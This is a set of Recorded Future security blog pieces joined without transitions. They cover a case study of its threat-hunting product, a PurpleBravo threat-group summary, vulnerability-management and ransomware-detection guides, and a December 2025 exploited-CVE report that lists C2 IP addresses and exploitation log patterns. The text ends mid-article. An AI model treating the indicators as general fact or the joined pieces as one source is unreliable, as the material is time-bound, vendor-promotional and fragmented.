• Autonomous Threat Operations reduced analyst-dependent, inconsistent processes, creating standardized hunts that deliver the same input, output, and expectations every time.
• Team members now run 15-20 threat hunts weekly—work that previously required days or weeks of manual research, coordination, and planning.
• During the Salt Typhoon campaign, Recorded Future's CISO launched a comprehensive network-wide threat hunt in five minutes between meetings, enabling immediate risk mitigation.
• A single pane of glass eliminates context-switching across multiple tools, allowing analysts to hunt threats and research IOCs within one platform.

Autonomous Threat Operations in action: Real results from Recorded Future’s own SOC team

The ultimate test of any cybersecurity solution Recorded Future builds? Using it to defend our own network.

That's exactly what we did with Autonomous Threat Operations. Before rolling it out to customers, we became Customer Zero, deploying the technology within our security operations organization to see if it could truly transform the way security teams hunt for threats.

The results exceeded our expectations. What we discovered wasn't just incremental improvement; it was a fundamental shift in what our security team could accomplish.

The challenge: Inconsistent and analyst-dependent threat hunting

Prior to implementing Autonomous Threat Operations, we faced the same threat hunting challenges many security teams struggle with today. As Josh Gallion, Recorded Future's Incident Response Manager, explains: "Before using Autonomous Threat Operations, our approach to threat hunting was more piecemeal and unique to each analyst. It varied based on whatever they were comfortable with and however they were trained on the tooling."

This inconsistency meant that the quality and thoroughness of our threat hunts varied significantly by analyst. And since each team member had different strengths, different levels of experience, and different comfort levels with our security tools, we struggled to standardize the process.

The transformation: Unified, repeatable threat hunting

Autonomous Threat Operations leveled the playing field immediately. "It unifies the hunting capability and makes it so that every time analysts run a hunt, it's the same," says Gallion. "We get the same input, we get the same output, and we know what to expect."

The implementation was remarkably straightforward. "When we turned it on, it just was a simple connection to our Splunk environment," he says. "And once the team started using it, we could see an increase in the number of threat hunts each user would do."

Perhaps most importantly, Autonomous Threat Operations enabled our team to shift from reactive, manual hunting to proactive, automated operations. "Now we can schedule hunts that will continuously run over time, update with the threat actor TTPs, and give us a more holistic view," Gallion says. "Before, we had to have an analyst get back into the product and look for new IOCs to run. Now it just runs it automatically and we know that that's taken care of."

Real-world impact: Upskilling junior analysts and enabling rapid response

According to Recorded Future's CISO, Jason Steer, the true value of Autonomous Threat Operations became clear through two significant outcomes.

First, the technology dramatically upskilled our junior staff. In traditional manual workflows, preparing to run a single threat hunt could take days or even weeks—requiring extensive research, coordination, and planning.

Today, our junior analysts are running 15–20 threat hunts each week to identify high-priority threats. This isn't just about quantity; it's about empowering less experienced team members to contribute meaningfully to our defense posture while accelerating their professional development.

Gallion sees this impact firsthand. "We have newer analysts who can do more advanced hunting based on IOCs, and it does it for them automatically in the background,” he says. “We get our results, and then they can do research in the app to shore up the findings."

Second, the speed and accessibility of automated threat hunting has proven invaluable during critical moments. When Steer read about Salt Typhoon making its way into corporate networks, he didn't need to schedule a meeting, assemble a team, or wait for the next sprint cycle. In the five minutes between meetings, he was able to launch a comprehensive threat hunt across Recorded Future's entire network to identify and mitigate associated risks to our systems.

That kind of rapid response would have been impossible with manual processes—and in today's threat landscape, that speed can mean the difference between containment and catastrophe.

The advantage of a single pane of glass

Another key benefit emerged around workflow efficiency. "Having a single pane of glass makes it a lot easier for an analyst to do not just the threat hunt, but also to see the meaning behind the IOCs that they're pulling back into the app," says Gallion. "Analysts don't like to have to get into a whole bunch of different applications. If we don't have to, it speeds things up and we can add context from inside the app."

This unified approach has eliminated the context-switching and tool-juggling that had often slowed down our security team and led to missed findings.

Why the Customer Zero experience matters

Serving as Customer Zero validated what we believed Autonomous Threat Operations could deliver to every customer: consistent, repeatable threat hunting that empowers analysts of all skill levels to defend their organizations more effectively. By testing the new solution within our own security operations first, we were able to identify what works, refine the capabilities that matter most, and prove that Autonomous Threat Operations isn't just a theoretical improvement—it's a practical solution that transforms daily security operations.

Gallion sums it up this way: "Some of the aspects of Autonomous Threat Operations that'll have the biggest impact are the repeatability, the scheduling of threat hunts to happen over time, and the single pane of glass that allows analysts to research IOCs in the app without having to go into multiple tools."

We saw a need for Autonomous Threat Operations, so we built it. Being Customer Zero enabled us to test it, refine it, and ensure that it’s the best possible solution to help our customers enter the era of the autonomous SOC.

Learn more about Autonomous Threat Operations by clicking here, or start operationalizing your threat intelligence now by booking a custom demo.

PurpleBravo is a North Korean state-sponsored threat group that overlaps with the “Contagious Interview” campaign first documented in November 2023. It targets software developers, especially in the software development and cryptocurrency verticals, via fake recruiter outreach, interview coding tests, and ClickFix prompts. Activity throughout 2025 has linked multiple fraudulent LinkedIn personas to PurpleBravo through malicious GitHub repositories and fictitious lure brands. The group’s tool set includes BeaverTail (a JavaScript infostealer and loader) and multi-platform remote access trojans (RATs), specifically, PyLangGhost and GolangGhost, optimized for stealing browser credentials and cryptocurrency wallet information.

Based on Recorded Future® Network Intelligence, Insikt Group identified 3,136 individual IP addresses concentrated in South Asia and North America linked to likely targets of PurpleBravo activity from August 2024 to September 2025. Twenty potential victim organizations were observed across the AI, cryptocurrency, financial services, IT services, marketing, and software development verticals in Europe, South Asia, the Middle East, and Central America. In several cases, it is likely that job-seeking candidates executed malicious code on corporate devices, creating organizational exposure beyond the individual target. Insikt Group observed PurpleBravo administering command-and-control (C2) servers via Astrill VPN and from IP ranges in China, with BeaverTail and GolangGhost C2 servers hosted across seventeen distinct providers.

Insikt Group distinguishes PurpleBravo (Contagious Interview) from PurpleDelta (North Korean IT workers) but has documented meaningful intersections. This includes a likely PurpleBravo operator displaying activity consistent with North Korean IT worker behavior, IP addresses in Russia linked to North Korean IT workers communicating with PurpleBravo C2 servers, and administration traffic from the same Astrill VPN IP address associated with PurpleDelta activity.

PurpleBravo presents an overlooked threat to the IT software supply chain. Because many targets are in the IT services and staff-augmentation industries with large public customer bases, compromises can propagate downstream to their customers. This campaign poses an acute software supply-chain risk to organizations that outsource development, particularly in regions where PurpleBravo concentrates its fictitious recruitment efforts.

Key Findings

• PurpleBravo employs a combination of fictitious personas, organizations, and websites to distribute malware to unsuspecting job seekers in the software development industry. Candidates sometimes use their corporate devices, thereby compromising their employers' security.
• PurpleBravo uses a variety of custom and open-source malware and tools in its operations, including BeaverTail, InvisibleFerret, GolangGhost, and PylangGhost.
• Using Recorded Future Network Intelligence, Insikt Group identified 3,136 individual IP addresses linked to likely targets of PurpleBravo activity and twenty potential victim organizations in the AI, cryptocurrency, financial services, IT services, marketing, and software development industries.
• Insikt Group has observed multiple points of overlap between PurpleBravo and PurpleDelta, Recorded Future’s designation for North Korean IT workers, indicating that some individuals may be active in both operations.
• PurpleBravo’s heavy targeting of the IT and software development industries in South Asia presents an overlooked and acute supply-chain risk to organizations that contract or outsource their IT services work.

• Traditional vulnerability management tools can no longer keep up with the speed of modern exploitation—threat context is now mandatory.
• Threat and Vulnerability Management (TVM) systems unify asset discovery, vulnerability data, and real-time external threat intelligence to prioritize real risk.
• Static CVSS scores fail to reflect exploitation likelihood; intelligence-driven, dynamic risk scoring is essential in 2026.
• Organizations that integrate vulnerability intelligence and attack surface intelligence reduce remediation time and security waste, enhancing detection and remediation while reducing alert fatigue.

Why Threat and Vulnerability Management Must Evolve in 2026

Security teams currently find themselves at a crossroads. Year over year, CVE volumes continue to surge higher and higher. Exploitation is faster, more automated, and more targeted, meaning attacks are growing in volume, velocity, and sophistication alike. As a result, security teams are expected to “patch faster” with fewer resources and can no longer realistically keep up with this ever-rising tide of threats.

Thanks to these forces, security teams have found themselves in a state of affairs in which vulnerability management has become an exercise in sheer volume, not risk. Day in and day out, teams are overwhelmed by alerts that lack real-world context, making it all but impossible to assess the actual degree of risk.

Thankfully, there is a solution. Threat-informed vulnerability management (TVM) has emerged to counteract this trend, enabling security teams to intelligently address weaponized vulnerabilities, zero-day exploits, and supply chain and cloud-native risk. All this comes along with much-needed relief from creeping alert-fatigue.

In 2026, effective cybersecurity programs will be defined not by how many vulnerabilities they detect but by how precisely they understand, prioritize, and neutralize real threats using intelligence-driven TVM systems.

The Core Problem: Alert Fatigue and Prioritization Failure

As it stands today, the explosion in disclosed vulnerabilities (CVEs) has outpaced humans’ abilities to triage and manage patching effectively. Today, the vast majority of organizations are incapable of remediating more than a fraction of the total identified issues affecting the ecosystem.

Traditionally, using a standard CVSS (Common Vulnerability Scoring System) was enough to overcome these challenges of prioritization. CVSS is an open, standardized framework used to assess the severity of security vulnerabilities by assigning a numerical score based on factors like exploitability, impact, and scope. Organizations use CVSS scores to prioritize remediation and compare vulnerabilities consistently across systems and vendors.

However, CVSS only measures theoretical severity, not exploitation likelihood. It misses critical pieces of context for prioritization decisions such as:

• Is exploit code available?
• Is the vulnerability actively exploited?
• Are threat actors discussing or operationalizing it?

As a result, high-severity CVEs that pose little real-world risk continue to consume time and resources, leading us back once again to the issue of alert fatigue and the inability to effectively triage and patch the most pressing vulnerabilities.

At the same time, we are seeing modern organizations struggle with a “silo problem,” in which security, IT, and CTI (cyber threat intelligence) teams operate independently and with limited visibility and collaboration between one another. In many organizations, each of these teams ends up using different tools, establishing different priorities, sharing findings infrequently if at all, and adopting entirely different “risk languages” through which they understand, prioritize, and address threats.

Taken broadly, this leaves organizations woefully lacking a unified, intelligence-driven view of risk. Without this, many adopt a de facto policy of “patch everything”. And it comes with significant costs, including:

• Operational drag and burnout
• Delayed remediation of truly dangerous vulnerabilities
• Increased business risk despite increased effort
• Fractured security operations

Both individually, and in the aggregate, these side-effects come at a significant detriment to organizational security. And as the number and diversity of CVEs continues to expand, the greater that cost becomes. Moving forward, organizations must find a better way.

The Evolving Threat Landscape Demands a New Approach

Today’s ever-changing landscape means that organizations must evolve along with it or risk falling dangerously behind. The rise of rapidly weaponized vulnerabilities (i.e., known software weaknesses that have moved beyond disclosure and into active attacker use) reflects a fundamental shift in how quickly and deliberately adversaries turn CVEs into operational threats. Today, the gap between disclosure, proof-of-concept release, and active exploitation has collapsed from months to days (or even hours), driven largely by exploit marketplaces, automated scanning, and widely shared tooling.

Attackers increasingly prioritize vulnerabilities that are easy to exploit, broadly applicable across cloud services, edge devices, and common dependencies, and capable of delivering fast returns. Once weaponized, these vulnerabilities manifest not as theoretical risk but as active intrusion campaigns, ransomware operations, and opportunistic internet-wide exploitation, making threat context essential for distinguishing true danger from background noise.

At the same time that weaponization is accelerating, attack surfaces are expanding. The average attack surface today is expanding and fragmenting across hybrid and multi-cloud environments, all of which is worsened by SaaS sprawl, shadow IT, and third-party and supply chain exposure. In this environment, it is absolutely critical that security teams have a clear understanding of vulnerabilities vs. threats, and work to establish an integrated approach between the two.

In short, a vulnerability is a technical weakness, while a threat is an actor, campaign or event at work exploiting that weakness. In order to be truly effective, modern threat vulnerability management (TVM) systems must merge both concepts to reflect real risk and separate signal from noise.

What Is Threat and Vulnerability Management (TVM)?

Threat and Vulnerability Management (TVM) — also called Threat-Informed Vulnerability Management — is a continuous, intelligence-driven process that prioritizes remediation based on three core variables:

• Active exploitation
• Threat actor behavior
• Asset criticality

TVM differs from traditional vulnerability management (VM) in a number of critical ways. Traditional VM relies on periodic scans, static severity scoring, and a largely reactive patching process. TVM, on the other hand, employs continuous monitoring, external threat intelligence enrichment, and close-loop remediation and validation.

This continuous, context-rich approach is foundational for modern security programs. Rather than inundating security teams with decontextualized CVEs and indiscriminate patching, modern TVM systems align security efforts with attacker reality. Reactive patching is replaced with proactive, risk-based decision-making, and as a result, organizations are able to reduce noise while simultaneously increasing the impact of their security operations.

The Five Core Pillars of Modern TVM Systems

As the speed and breadth of today’s threats continue to grow, traditional VM, being fundamentally reactive in nature, is no longer enough to keep up. In a world where vulnerabilities are exposed by the day, TVM offers much-needed efficiency, intelligence, and proactiveness. However, not all TVM systems are created equally. Here are five core pillars of effective modern TVM systems to help you evaluate and assess solutions on the market.

1. Continuous Asset Discovery & Inventory

Modern TVM systems are invaluable in that they provide full visibility across the entirety of an organization’s growing and fragmented attack surface. This includes external-facing assets, shadow IT, and cloud and SaaS environments alike. By providing continuous asset discovery and a timely, up-to-date inventory of one’s assets, TVM systems allow for real-time, comprehensive, attack-surface management.

Remember, you can’t defend what you can’t see. That’s why attack surface management (ASM) is a prerequisite for effective TVM. Without accurate, up-to-date asset inventories, vulnerability data is incomplete and misleading. Continuous discovery ensures defenders see their environment the way attackers do.

2. Vulnerability Assessment & Scoring

TVM goes beyond internal scanning tools to identify vulnerabilities exposed to the internet and reassess them continuously as environments change. This includes tracking misconfigurations, outdated services, and newly introduced exposure, not just known CVEs.

3. External Threat Context Enrichment

This is where TVM fundamentally diverges from legacy approaches. External threat intelligence enriches vulnerability data with insight from dark web and criminal forums, exploit marketplaces, malware telemetry, and active attack campaigns.

Vulnerabilities are mapped to known threat actors, active exploitation, and MITRE ATT&CK® techniques, ultimately transforming raw findings into actionable intelligence.

4. Risk-Based Prioritization (RBVM)

Risk-based vulnerability management prioritizes issues based on the probability of exploitation, asset importance, and threat actor interest. This shifts the focus from “most severe” to “most dangerous,” enabling teams to address the vulnerabilities that pose the greatest immediate risk to their organizations.

5. Automated Remediation & Verification

Modern TVM integrates directly with IT and SecOps workflows, pushing prioritized findings into ticketing and automation platforms. Just as importantly, it verifies remediation to confirm that patches were applied and exposure was actually reduced, creating a continuous feedback loop.

These five pillars of effective TVM systems come together to create a whole that is greater than the sum of its parts. These systems, unlike their predecessors, are designed to continuously monitor and triage real threats and vulnerabilities in context and ensure awareness and proactive mitigation without the risk of burn-out and alert fatigue.

Stop Patching Everything — Use Intelligence to Prioritize Real Risk

The scale of the CVE problem is overwhelming. Tens of thousands of vulnerabilities are disclosed each year, yet only a small fraction are ever exploited in the wild. Treating them all as equally urgent is not just inefficient — it’s dangerous.

Vulnerability intelligence changes the equation by tracking a CVE across its full lifecycle, from initial disclosure to weaponization, exploitation, and criminal adoption. This enables dynamic risk scoring that reflects real-world conditions rather than static assumptions.

Dynamic risk scoring incorporates evidence of active exploitation, availability of exploit code, dark web chatter, and threat actor interest. As conditions change, so does the risk score, ensuring prioritization remains aligned with attacker behavior.

The operational impact is significant. Security teams can focus remediation on the top 1% of vulnerabilities that pose immediate risk, respond faster, reduce operational cost, and strengthen overall security posture.

See Your Risk Like an Attacker: The Full Attack Surface View

In today’s threat landscape, security teams must recast the way they envision their roles. Rather than operating in a reactive, defensive manner at all times, security teams should think more like their adversaries, taking a complete view of their attack surface and leveraging modern tools and technologies to ensure intelligent, prioritized defenses. The following three key concepts will help you take on that mentality.

1. The Visibility Gap: Unknown assets create unknown risk. Traditional scanners often miss orphaned domains, misconfigured cloud services, and forgotten infrastructure — precisely the assets attackers look for first.
2. Attack Surface Intelligence Explained: Attack surface intelligence provides continuous mapping of domains, IPs, cloud assets, and external services. It identifies exposures attackers see before defenders do, enabling proactive remediation rather than reactive cleanup.
3. Connecting the Dots with Vulnerability Tools: When integrated with vulnerability scanners like Qualys and Tenable, attack surface intelligence provides a unified, prioritized view of exposure. Intelligence-driven platforms serve as a single source of truth for risk decisions, enabling teams to connect vulnerabilities to real-world exposure and threat activity.

Three Strategic Recommendations for Security Leaders

Most organizations remain behind the curve in threat and vulnerability management. Knowing what we know now, there are three strategic steps security leaders can take to reclaim control.

1. Bridge the Gap Between Security and IT

Establish a shared, intelligence-driven risk language. Align SLAs with real-world risk rather than raw severity scores, ensuring remediation efforts focus on what matters most.

2. Embrace Automation and Workflow Integration

Push prioritized findings directly into platforms like ServiceNow and SOAR tools. Reducing manual handoffs accelerates remediation and minimizes delays.

3. Measure What Matters — Time-to-Remediate (TTR)

Shift KPIs toward time-to-remediate actively exploited vulnerabilities and reduction in exposure windows. These metrics demonstrate real ROI and security impact.

The Path Forward Is Threat-Informed: Strengthen Your Threat and Vulnerability Strategy

Volume-based vulnerability management is no longer viable. As we progress through 2026, threat context is not optional. It is foundational.

Future-ready security programs are intelligence-led, automation-enabled, and attacker-aware. Recorded Future sits at the center of this shift, providing the intelligence backbone required to move from reactive patching to proactive risk reduction.

Explore how Recorded Future Vulnerability Intelligence and Attack Surface Intelligence can help your organization transition from alert-driven vulnerability management to intelligence-driven risk reduction.

By unifying threat intelligence, vulnerability data, and attack surface visibility, organizations can reduce alert fatigue, prioritize what truly matters, and proactively harden defenses against real-world threats before attackers exploit them.

• Effective ransomware detection requires three complementary layers: endpoint and extended detection and response (EDR/XDR) to monitor device-level activity, network detection and response (NDR) to catch lateral movement, and threat intelligence tools to provide context that enables efficient prioritization.
• The most valuable detection happens before ransomware encryption begins. Tools must identify precursor behaviors like reconnaissance, credential theft, and data staging rather than waiting for known indicators of compromise.
• Intelligence quality determines detection quality: even sophisticated security tools require real-time threat data about active ransomware campaigns, attacker infrastructure, and current tactics, techniques, and procedures (TTPs) to distinguish genuine threats from noise.
• Recorded Future strengthens the entire detection stack by providing organization-specific threat intelligence, early detection capabilities (in some cases, identifying victims up to 30 days before public extortion), and vulnerability intelligence focused on what ransomware groups are actively exploiting.

Introduction

The ransomware playbook has fundamentally changed. Instead of casting wide nets with opportunistic phishing campaigns, attackers now focus on big-game hunting: targeting high-value enterprises with data theft and double or triple extortion tactics. Threat actors purchase pre-compromised access from brokers, exploit newly disclosed vulnerabilities within hours, and use automation to compress weeks-long campaigns into days.

The results are stark. Ransomware now appears in 44% of breaches, up from 32% the prior year, according to the 2025 Verizon Data Breach Investigations Report. Traditional signature-based detection tools often can't keep pace because ransomware groups continuously rotate their infrastructure, modify malware variants, and adopt new tactics faster than defenses can update. By the time a signature is written, the threat has already evolved.

This gap has created demand for a different approach: intelligence-driven ransomware detection. Rather than waiting for known indicators of compromise, these tools identify the precursor behaviors that happen before encryption (e.g. reconnaissance, credential theft, lateral movement, privilege escalation, and data staging).

The key is continuous external intelligence that maps what's happening in your environment to active campaigns and specific ransomware families operating in the wild.

The most effective defense combines three layers: endpoint and extended detection and response (EDR/XDR) to catch suspicious behaviors on devices, network detection and response (NDR) with deception technology to spot lateral movement, and threat intelligence tools that provide the real-time context tying it all together. When these tools share a common intelligence foundation, they can reveal malicious intent well before encryption begins.

The Ransomware Detection Tool Landscape: Three Pillars of Defense

Effective ransomware detection generally requires three complementary tool categories, each targeting different stages of an attack.

1. Endpoint and Extended Detection and Response (EDR/XDR) Tools

EDR and XDR platforms form the first line of defense, monitoring individual devices and user activity for signs of compromise.

Core Functionality

EDR and XDR solutions monitor endpoints for suspicious behaviors like privilege escalation, credential dumping, unusual process creation, and bulk file modifications. When they detect threats, these tools automatically isolate devices, roll back changes, and contain threats, cutting response time from hours to seconds.

How Threat Intelligence Enhances EDR/XDR

Threat intelligence connects endpoint activity to active campaigns in the wild. When an EDR tool flags suspicious activity, intelligence context reveals whether it matches known campaigns from groups like LockBit, ALPHV/BlackCat, or BlackBasta. This can dramatically reduce false positives by distinguishing unusual-but-legitimate administrative work from activity aligned with active ransomware operations.

Example Tools

• CrowdStrike Falcon delivers strong behavioral detection capabilities tied to comprehensive actor profiling. The platform's threat graph continuously correlates endpoint telemetry with global threat intelligence, enabling rapid identification of ransomware precursors.
• Microsoft Defender XDR integrates telemetry across identity systems, endpoints, email, and cloud applications. This unified visibility helps security teams identify cross-domain attack patterns that indicate ransomware preparation, such as credential theft followed by lateral movement.
• SentinelOne employs behavioral AI to detect malicious activity and offers automated rollback features that can reverse ransomware encryption and file modifications, effectively restoring systems to their pre-attack state.

2. Network Detection and Response (NDR) Tools

While EDR focuses on individual endpoints, NDR tools monitor the network layer to catch attackers as they move between systems.

Core Functionality

NDR platforms watch internal network traffic to catch attackers moving laterally, scanning for targets, or accessing resources they shouldn't. The more advanced versions include deception technology like honeypots, fake credentials, and decoy systems that look like attractive targets. When attackers interact with these decoys during reconnaissance, security teams get early warnings before any real damage occurs.

How Threat Intelligence Improves NDR and Deception

Threat intelligence helps organizations customize deception environments based on active ransomware groups in their industry. When NDR tools spot anomalies such as unusual file sharing, unexpected queries, or abnormal transfers, intelligence matches these to current attack techniques, distinguishing administrative work from reconnaissance patterns before data staging begins.

Example Tools

• Vectra AI specializes in detecting lateral movement and privilege misuse by correlating network behaviors with active attacker tradecraft. The platform's AI-driven detection identifies subtle deviations from normal network patterns that indicate ransomware reconnaissance.
• ExtraHop Reveal(x) provides real-time network visibility that identifies reconnaissance activity and command-and-control (C2) communications. The platform's deep packet inspection capabilities reveal malicious traffic even when encrypted or obfuscated.
• Illusive (now part of Zscaler) deploys deception technology specifically tuned to adversary behaviors. The platform's decoys and fake credentials create a minefield for attackers, triggering high-confidence alerts when threat actors interact with deception assets.

3. Threat Intelligence Tools

The third pillar provides the context that makes endpoint and network detection tools more accurate and actionable.

Core Functionality

Threat intelligence tools pull together global threat data from sources like dark web forums, malware repositories, scanning activity, and criminal infrastructure. They enrich alerts from your other security tools with context about who's behind an attack, which campaign it's part of, and what techniques the attackers are likely to use next.

How Threat Intelligence Strengthens Ransomware Detection

These tools deliver several critical capabilities that transform how security teams identify and respond to ransomware threats:

• Threat Mapping: Identifies whether your organization matches the targeting profile of active ransomware groups based on your industry, size, region, and technology stack. Specific operators are mapped using their TTPs to determine the intent and opportunity of carrying out a successful attack against your business.
• Infrastructure Tracking: Monitors ransomware operators' continuous infrastructure shifts in real-time, identifying new C2 servers, drop sites, and payment infrastructure as they emerge.
• Variant Identification: Rapidly analyzes and disseminates indicators when ransomware groups release new malware variants, enabling detection before signature-based systems receive updates.
• Exploitation Intelligence: Identifies specific CVEs and misconfigurations that attackers are actively weaponizing, moving vulnerability management from severity-score-driven to threat-driven prioritization.
• Risk Scoring: Provides real-time scores combining multiple intelligence signals—indicator prevalence, campaign association, TTP alignment—to guide analysts toward genuine threats rather than generic suspicious activity.

Example Tools

• Recorded Future delivers organization-specific threat intelligence powered by The Intelligence Graph and proprietary AI. The platform provides end-to-end visibility into exposures, while research from its Insikt Group enables early detection of ransomware activity, identifying potential victims up to 30 days before public extortion.
• Flashpoint specializes in deep and dark web intelligence, monitoring criminal forums, marketplaces, and chat channels where ransomware operators communicate, recruit, and trade access. This visibility into adversary communities provides early warnings about emerging threats and campaigns.
• Google Threat Intelligence (formerly Mandiant) combines frontline incident response insights with global threat tracking. The platform leverages intelligence from breach investigations to identify ransomware group behaviors and attack patterns as they emerge.

Choosing the Right Ransomware Detection Tools

Security leaders must distinguish between tools that reduce ransomware risk and those that add noise. The most effective tools share several characteristics.

Security leaders should prioritize:

• Pre-encryption visibility: Detect credential misuse, suspicious access, and lateral movement during reconnaissance and preparation phases when interventions are most effective.
• Context-rich alerts: Alerts should include TTPs, infrastructure associations, and known actor activity and explain not just what triggered an alert but why it matters.
• Integration maturity: Smooth data flow into SIEM, SOAR, and existing investigation workflows without creating siloed intelligence or blind spots.
• Operational efficiency: Tools should reduce alert noise, not add to it, decreasing time-to-detection and time-to-response.
• Relevance: Intelligence must map to current campaigns. Generic or stale indicators waste analyst time and create false confidence.
• Scalability: Handle hybrid environments spanning on-premises infrastructure, multiple cloud providers, and remote endpoints without performance degradation.

How Recorded Future Enables Early Ransomware Detection

The quality of threat intelligence directly determines detection effectiveness. Even sophisticated endpoint and network tools require high-fidelity, current threat data to generate value. Security teams have plenty of options for tools; the real challenge is addressing alert fatigue draining analyst time on false positives instead of credible threats.

Recorded Future functions as the continuous intelligence layer strengthening the entire detection stack. Rather than adding another alert-generating tool, it feeds existing security ecosystems with real-time context about ransomware operator behavior.

Real-Time Relevance Through SecOps Intelligence

Every alert that hits your SIEM or endpoint platform gets automatically enriched with real-time risk scores, associated malware and infrastructure, and links to known attacker techniques and campaigns. Security tools can immediately recognize whether an indicator matches an active ransomware operation, cutting triage time from hours to minutes.

Proactive Mitigation Through Vulnerability Intelligence

Recorded Future identifies which vulnerabilities ransomware groups are actually exploiting right now, not just which ones have the highest theoretical severity ratings. This distinction matters because most high-severity vulnerabilities never get exploited in the wild, while some medium-severity vulnerabilities become critical the moment ransomware operators weaponize them.

The platform shows you which vulnerabilities specific ransomware groups are targeting, where exploit code is available, and which vulnerabilities are generating buzz in criminal forums. This lets security teams prioritize patching based on what attackers are actually doing, focusing on the access vectors most likely to result in ransomware incidents.

Victimology and Anticipation

Intelligence about dark web chatter, leak site activity, and victimology patterns reveals which industries, geographies, and technologies are being targeted. When Recorded Future detects increased targeting of specific sectors, SOC analysts can anticipate attack paths, tighten access controls, and implement protective measures before campaigns reach their network.

This closes the gap between reconnaissance and encryption. Most traditional tools don't trigger alerts until ransomware starts encrypting systems, by which point attackers have already stolen data. Intelligence-driven detection can catch the reconnaissance, credential theft, and lateral movement phases that happen first, shifting your response window from reactive damage control to proactive early containment.

Shifting From Reactive Response to Intelligence-Led Prevention

No single tool stops ransomware. The strongest defense is an integrated ecosystem where endpoint detection, network monitoring, and threat analysis platforms work from the same intelligence foundation.

Intelligence elevates these tools from reactive detection to early recognition of adversary behavior during preparation and reconnaissance phases, enabling intervention before ransomware reaches its destructive phase. Organizations that build detection architecture on real-time threat intelligence will adapt as quickly as their adversaries, maintaining effective defenses as the threat landscape evolves.

What security teams need to know:

• React2Shell pandemonium: CVE-2025-55182 triggered a global exploitation wave with multiple threat actors deploying diverse malware families
• China-nexus exploitation intensifies: Earth Lamia, Jackpot Panda, and UAT-9686 leveraged critical flaws for espionage operations
• Public exploits proliferate: Eleven of 22 vulnerabilities have proof-of-concept code available, accelerating exploitation timelines
• Legacy vulnerabilities resurface: CISA added 2018-2022 era flaws to its Known Exploited Vulnerabilities (KEV) catalog, highlighting persistent patch gaps

Bottom line: December's surge reflects both new zero-days and renewed interest in legacy vulnerabilities. React2Shell alone demonstrates how quickly modern web frameworks can become global attack vectors.

Quick Reference Table

All 22 vulnerabilities below were actively exploited in December 2025.

Table 1: List of vulnerabilities that were actively exploited in December based on Recorded Future data (Source: Recorded Future)

Key Trends in December 2025

Affected Vendors

• Fortinet continued vulnerability concerns with two critical authentication bypass flaws
• Google faced three vulnerabilities across Android (2) and Chromium (1) platforms
• Microsoft dealt with a Windows kernel use-after-free vulnerability
• Meta experienced the month's most impactful vulnerability with React2Shell
• Additional affected vendors: Array Networks, Gogs, Gladinet, ASUS, Cisco, Apple, SonicWall, WatchGuard, MongoDB, Digiever, Sierra Wireless, OSGeo, RARLAB, D-Link, and OpenPLC

Most Common Weakness Types

• CWE-22 – Path Traversal
• CWE-347 – Improper Verification of Cryptographic Signature
• CWE-416 – Use After Free
• CWE-434 – Unrestricted Upload of File with Dangerous Type
• CWE-787 – Out-of-bounds Write

Threat Actor Activity

React2Shell exploitation dominated December’s CVE activity:

• Threat actors observed to have exploited this vulnerability:
  • China-nexus actors Earth Lamia and Jackpot Panda
  • China-linked clusters UNC6600, UNC6586, UNC6588, UNC6603, and UNC6595
  • North Korea-linked and financially motivated groups
• Observed payloads included EtherRAT, PeerBlight, CowTunnel, ZinFoq, Kaiji variants, Zndoor, RondoDox, MINOCAT, SNOWLIGHT, COMPOOD, HISONIC, ANGRYREBEL.LINUX, and Weaxor ransomware (using a Cobalt Strike stager)
• Infrastructure connections to HiddenOrbit relay infrastructure and GobRAT relay component

Additional activity:

• UAT-9686 exploited Cisco Secure Email Gateway (CVE-2025-20393), deploying AquaShell, AquaPurge, and AquaTunnel
• Unknown actors leveraged Gogs vulnerability (CVE-2025-8110) for Supershell malware deployment

Priority Alert: Active Exploitation

These vulnerabilities demand immediate attention due to confirmed widespread exploitation.

CVE-2025-55182 | Meta React Server Components (React2Shell)

Risk Score: 99 (Very Critical) | CISA KEV: Added December 5, 2025

Why this matters: Unauthenticated RCE affects React and Next.js, among the world's most popular web frameworks. Multiple threat actors are actively exploiting vulnerable instances with diverse malware payloads.

Affected versions:

• React packages: react-server-dom-webpack, react-server-dom-parcel, react-server-dom-turbopack (19.0.0, 19.1.0, 19.1.1, and 19.2.0)
• Next.js: 15.x, 16.x, and Canary builds from 14.3.0-canary.77
• Also affects: React Router, Waku, RedwoodSDK, Parcel, Vite RSC plugin

Immediate actions:

• Upgrade React to 19.0.3, 19.1.4, or 19.2.3 immediately
• Update Next.js to 16.0.7, 15.5.7, 15.4.8, 15.3.6, 15.2.6, 15.1.9, or 15.0.5
• Monitor for unusual multipart/form-data POST requests consistent with Next.js Server Actions / RSC endpoints
• Check logs for E{"digest" error patterns indicating exploitation attempts
• Review server processes for unexpected Node.js child processes

Exposure: ~310,500 Next.js instances on Shodan (US, India, Germany, Japan, Australia)

Figure 1: Vulnerability Intelligence Card® for CVE-2025-55182 (React2Shell) in Recorded Future (Source: Recorded Future)

CVE-2025-20393 | Cisco Secure Email Gateway

Risk Score: 99 (Very Critical) | Active exploitation by UAT-9686

Why this matters: Chinese threat actors are actively compromising email security infrastructure to establish persistent access and pivot into internal networks.

Affected products: Cisco Secure Email Gateway and Secure Email and Web Manager running AsyncOS

Immediate actions:

• Apply Cisco's security updates immediately
• Monitor Spam Quarantine web interface access logs
• Check for modifications to /data/web/euq_webui/htdocs/index.py
• Hunt for AquaShell, AquaPurge, and AquaTunnel indicators
• Review outbound connections to suspicious IPs

Known C2 infrastructure: 172.233.67.176, 172.237.29.147, 38.54.56.95 (inactive)

• Intelligence drives better decisions. High-performing teams use threat intelligence not just for detection, but to inform strategic business decisions and communicate risk to leadership.
• Maturity means efficiency. Advanced programs focus on automation, high-fidelity indicators, and cross-functional collaboration—freeing analysts to concentrate on strategic initiatives.
• Information overload is the top challenge. Teams need better integrations and AI-powered tools to transform massive data volumes into actionable insights.
• AI will reshape the analyst role. While junior analysts won't be replaced, their workflows will evolve significantly as AI augments their capabilities.

Recorded Future recently hosted two webinars to unpack key insights from the 2025 State of Threat Intelligence Report and hear directly from customers who are putting these findings into practice.

Based on survey responses from 615 cybersecurity executives and practitioners, the report showed clear industry trends. Threat intelligence spending is up, with 76% of organizations spending over $250,000 annually and 91% planning to increase spending in 2026. Even more critically, 87% said they expect to advance the maturity of their threat intelligence programs over the next two years.

But what does maturity actually look like in practice? Our customers offered candid perspectives on how they're turning intelligence into impact.

Intelligence as a strategic asset

